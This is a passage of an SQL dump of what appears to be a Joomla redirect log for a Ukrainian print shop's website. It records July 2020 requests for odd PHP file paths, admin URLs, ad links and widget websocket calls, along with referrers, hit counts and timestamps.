00:00:00',301),(17403,'https://ekvatorprint.com.ua/administrator/components/com_admin/views/gank.php.php',NULL,'http://site.ru','',2,0,'2020-07-01 03:57:31','0000-00-00 00:00:00',301),(17404,'https://ekvatorprint.com.ua/templates/ambient/js/wp-side.php',NULL,'http://site.ru','',2,0,'2020-07-01 04:24:25','0000-00-00 00:00:00',301),(17405,'https://ekvatorprint.com.ua/images/downloadprospectus/licensed.php',NULL,'http://site.ru','',1,0,'2020-07-01 04:25:54','0000-00-00 00:00:00',301),(17406,'https://ekvatorprint.com.ua/plugins/system/jsnframework/libraries/joomlashine/update/htaccess.php',NULL,'http://site.ru','',3,0,'2020-07-01 04:27:03','0000-00-00 00:00:00',301),(17407,'https://ekvatorprint.com.ua/cache/ganks.php.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-01 04:49:07','0000-00-00 00:00:00',301),(17408,'https://ekvatorprint.com.ua/administrator/components/com_admin/models/feter.php',NULL,'http://site.ru','',1,0,'2020-07-01 05:19:14','0000-00-00 00:00:00',301),(17409,'https://ekvatorprint.com.ua/components/com_falang/readme.php',NULL,'http://site.ru','',2,0,'2020-07-01 05:47:43','0000-00-00 00:00:00',301),(17410,'https://ekvatorprint.com.ua/public/hebadge_pagebadge/simpleside.php5.suspected',NULL,'http://site.ru','',1,0,'2020-07-01 05:49:54','0000-00-00 00:00:00',301),(17411,'https://ekvatorprint.com.ua/components/com_content/controllers/green.php',NULL,'http://site.ru','',4,0,'2020-07-01 06:14:37','0000-00-00 00:00:00',301),(17412,'https://ekvatorprint.com.ua/administrator/components/com_phocagallery/views/phocagalleryfba/tmpl/languages.php',NULL,'http://site.ru','',1,0,'2020-07-01 07:24:15','0000-00-00 00:00:00',301),(17413,'https://ekvatorprint.com.ua/images/404.php',NULL,'http://site.ru','',3,0,'2020-07-01 07:35:53','0000-00-00 00:00:00',301),(17414,'https://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/preview/htaccess.php',NULL,'http://site.ru','',1,0,'2020-07-01 07:53:37','0000-00-00 00:00:00',301),(17415,'https://ekvatorprint.com.ua/images/chitradurga/licensed.php',NULL,'http://site.ru','',1,0,'2020-07-01 07:54:20','0000-00-00 00:00:00',301),(17416,'https://ekvatorprint.com.ua/components/com_content/views/archive/ypma90z.php',NULL,'http://site.ru','',1,0,'2020-07-01 07:56:06','0000-00-00 00:00:00',301),(17417,'https://ekvatorprint.com.ua/components/com_weblinks/rf8zd3.php',NULL,'http://site.ru','',1,0,'2020-07-01 08:04:30','0000-00-00 00:00:00',301),(17418,'https://ekvatorprint.com.ua/fahw3r.php',NULL,'http://site.ru','',2,0,'2020-07-01 08:15:28','0000-00-00 00:00:00',301),(17419,'https://ekvatorprint.com.ua/components/com_jce/editor/extensions/mediaplayer/wp-blog.php',NULL,'http://site.ru','',1,0,'2020-07-01 08:35:39','0000-00-00 00:00:00',301),(17420,'https://ekvatorprint.com.ua/administrator/components/com_phocagallery/libraries/phocagallery/library/htaccess.php',NULL,'http://site.ru','',2,0,'2020-07-01 08:46:38','0000-00-00 00:00:00',301),(17421,'https://ekvatorprint.com.ua/images/pntn.php',NULL,'http://site.ru','',1,0,'2020-07-01 09:16:44','0000-00-00 00:00:00',301),(17422,'https://ekvatorprint.com.ua/cache/lyonc.php',NULL,'http://site.ru','',1,0,'2020-07-01 09:51:26','0000-00-00 00:00:00',301),(17423,'https://ekvatorprint.com.ua/bmmive.php',NULL,'http://site.ru','',1,0,'2020-07-01 10:11:50','0000-00-00 00:00:00',301),(17424,'https://ekvatorprint.com.ua/index.html',NULL,'','',10,0,'2020-07-01 10:23:28','0000-00-00 00:00:00',301),(17425,'https://ekvatorprint.com.ua/home.html',NULL,'','',10,0,'2020-07-01 10:23:30','0000-00-00 00:00:00',301),(17426,'https://ekvatorprint.com.ua/home.htm',NULL,'','',9,0,'2020-07-01 10:23:31','0000-00-00 00:00:00',301),(17427,'https://ekvatorprint.com.ua/index.htm',NULL,'','',10,0,'2020-07-01 10:23:31','0000-00-00 00:00:00',301),(17428,'https://ekvatorprint.com.ua/*',NULL,'','',9,0,'2020-07-01 10:23:31','0000-00-00 00:00:00',301),(17429,'https://ekvatorprint.com.ua/cms/admin',NULL,'','',2,0,'2020-07-01 10:23:32','0000-00-00 00:00:00',301),(17430,'https://ekvatorprint.com.ua/index',NULL,'','',9,0,'2020-07-01 10:23:32','0000-00-00 00:00:00',301),(17431,'https://ekvatorprint.com.ua/index/',NULL,'','',9,0,'2020-07-01 10:23:32','0000-00-00 00:00:00',301),(17432,'https://ekvatorprint.com.ua/manager',NULL,'','',3,0,'2020-07-01 10:23:33','0000-00-00 00:00:00',301),(17433,'https://ekvatorprint.com.ua/textpattern',NULL,'','',2,0,'2020-07-01 10:23:33','0000-00-00 00:00:00',301),(17434,'https://ekvatorprint.com.ua/components/com_content/views/archive/edit_page.php',NULL,'http://site.ru','',1,0,'2020-07-01 11:05:09','0000-00-00 00:00:00',301),(17435,'https://ekvatorprint.com.ua/errlog.php',NULL,'http://site.ru','',1,0,'2020-07-01 12:20:50','0000-00-00 00:00:00',301),(17436,'https://ekvatorprint.com.ua/910558926c6128d3169661095c65bbaf',NULL,'https://a.pr-cy.ru/ekvatorprint.com.ua','',1,0,'2020-07-03 12:48:31','0000-00-00 00:00:00',301),(17437,'https://ekvatorprint.com.ua/wp-log-7.php',NULL,'','',3,0,'2020-07-03 17:51:13','0000-00-00 00:00:00',301),(17438,'https://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/themes/none/beautifu.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-04 02:47:20','0000-00-00 00:00:00',301),(17439,'https://ekvatorprint.com.ua/\",null,null,null,[],[],null,\"https:/googleads.g.doubleclick.net/pagead/conversion/?ai=cr22se6acx47pg9xayre1gcab8ydr8fbt5zitmgn16nq_zqeqascvp_wnykx2o4ami6abuvrpvgpiaqgpani6lgyiv2m-qambyaplbkoewafp0dtdxxdeuefx48l287k1g9dmfrqx7ypjvv1vs4rygtgrl_lvqpqw8t_nt70wx3ffi0jjusb-j07czgly_ei-yffydlqx5danhf2gvqypbap-lqey57pylxndnv-1_5sjzx9spklx1d5rkyzubfsoargd6p7vo8f4noghkskw9s2fekywvrjitk7sgnod50wfhpne3flbgoiv42g1ajewrnv3_i9t5galmipeh9lhd4gapgv7x6lbostfxtfy9ypabi6b9sz9aygf0r6plafybgkab66fsegob47og6gh1ckbqaet2buob7ogqafw2ruob_lzg6ghpr4bqafs1ruob_prg6gh7nubqaew2buob8lag9ghaaai_eg9sagc0gghcibheaeyh7ejfykocusqvfmacggycwhicwhyewycfa0ac3d3dy51a3iubmv0',NULL,'','',1,0,'2020-07-06 03:52:52','0000-00-00 00:00:00',301),(17440,'https://ekvatorprint.com.ua/\",null,null,null,[],[],null,\"https:/googleads.g.doubleclick.net/pagead/conversion/?ai=ctus_nkacx_otknegyd-5m4al8ydr8fbt5zitmgn16nq_zqeqascvp_wnykx2o4ami6abuvrpvgpiaqgpani6lgyiv2m-qambyaplbkoewafp0c5hxpb6ev0qshkevyese0pc2lampzeslko5rbii9hcbnotczlzztsvde8yqkerjlypkekutzsz241l4yfpfjvdyjrokmwx3tm21a4ahtblz4vmim6ih9dqc904c-fgkte16atz-79emaxmo8orb9b4a9vl0pe8a_mb58r0ddlgpld-wgm-6x4ygxjotcwbdtgkungn-0kv_5v7tnoidmgvrwl9nilvet6xj8y2finsapxc__nx7yj_47drvuwlabi6b9sz9aygf0r6plafybgkab66fsegob47og6gh1ckbqaet2buob7ogqafw2ruob_lzg6ghpr4bqafs1ruob_prg6gh7nubqaew2buob8lag9ghaaai_eg9sagc0gghcibheaeyh7ejfykocusqvfmacggycwhicwhyewycfa0ac3d3dy51a3iubmv0',NULL,'','',1,0,'2020-07-06 03:55:09','0000-00-00 00:00:00',301),(17441,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=1b158',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:23:30','0000-00-00 00:00:00',301),(17442,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038211008',NULL,'','',1,0,'2020-07-06 12:23:31','0000-00-00 00:00:00',301),(17443,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=17cf5',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:23:31','0000-00-00 00:00:00',301),(17444,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038261006',NULL,'','',1,0,'2020-07-06 12:24:21','0000-00-00 00:00:00',301),(17445,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=1b3f3',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:24:21','0000-00-00 00:00:00',301),(17446,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038321008',NULL,'','',1,0,'2020-07-06 12:25:21','0000-00-00 00:00:00',301),(17447,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=10bf6',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:25:21','0000-00-00 00:00:00',301),(17448,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038381009',NULL,'','',1,0,'2020-07-06 12:26:21','0000-00-00 00:00:00',301),(17449,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=197e3',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:26:21','0000-00-00 00:00:00',301),(17450,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038441011',NULL,'','',1,0,'2020-07-06 12:27:21','0000-00-00 00:00:00',301),(17451,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=1bc51',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:27:21','0000-00-00 00:00:00',301),(17452,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038501025',NULL,'','',1,0,'2020-07-06 12:28:21','0000-00-00 00:00:00',301),(17453,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=15f18',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:28:21','0000-00-00 00:00:00',301),(17454,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038561011',NULL,'','',1,0,'2020-07-06 12:29:21','0000-00-00 00:00:00',301),(17455,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=14ef2',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:29:21','0000-00-00 00:00:00',301),(17456,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038621013',NULL,'','',1,0,'2020-07-06 12:30:21','0000-00-00 00:00:00',301),(17457,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=17766',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:30:21','0000-00-00 00:00:00',301),(17458,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038681037',NULL,'','',1,0,'2020-07-06 12:31:21','0000-00-00 00:00:00',301),(17459,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=10a2d',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:31:21','0000-00-00 00:00:00',301),(17460,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038741016',NULL,'','',1,0,'2020-07-06 12:32:21','0000-00-00 00:00:00',301),(17461,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=181a9',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:32:21','0000-00-00 00:00:00',301),(17462,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038801019',NULL,'','',1,0,'2020-07-06 12:33:21','0000-00-00 00:00:00',301),(17463,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=170bd',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:33:21','0000-00-00 00:00:00',301),(17464,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038861021',NULL,'','',1,0,'2020-07-06 12:34:21','0000-00-00 00:00:00',301),(17465,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=18f03',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:34:21','0000-00-00 00:00:00',301),(17466,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038921022',NULL,'','',1,0,'2020-07-06 12:35:21','0000-00-00 00:00:00',301),(17467,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=10950',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:35:21','0000-00-00 00:00:00',301),(17468,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594038981020',NULL,'','',1,0,'2020-07-06 12:36:21','0000-00-00 00:00:00',301),(17469,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=111d6',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:36:21','0000-00-00 00:00:00',301),(17470,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594039041026',NULL,'','',1,0,'2020-07-06 12:37:21','0000-00-00 00:00:00',301),(17471,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=11eab',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:37:21','0000-00-00 00:00:00',301),(17472,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594039101031',NULL,'','',1,0,'2020-07-06 12:38:21','0000-00-00 00:00:00',301),(17473,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=1eb1a',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:38:21','0000-00-00 00:00:00',301),(17474,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594039161028',NULL,'','',1,0,'2020-07-06 12:39:21','0000-00-00 00:00:00',301),(17475,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=186ed',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 12:39:21','0000-00-00 00:00:00',301),(17476,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594039221028',NULL,'','',1,0,'2020-07-06 12:40:21','0000-00-00 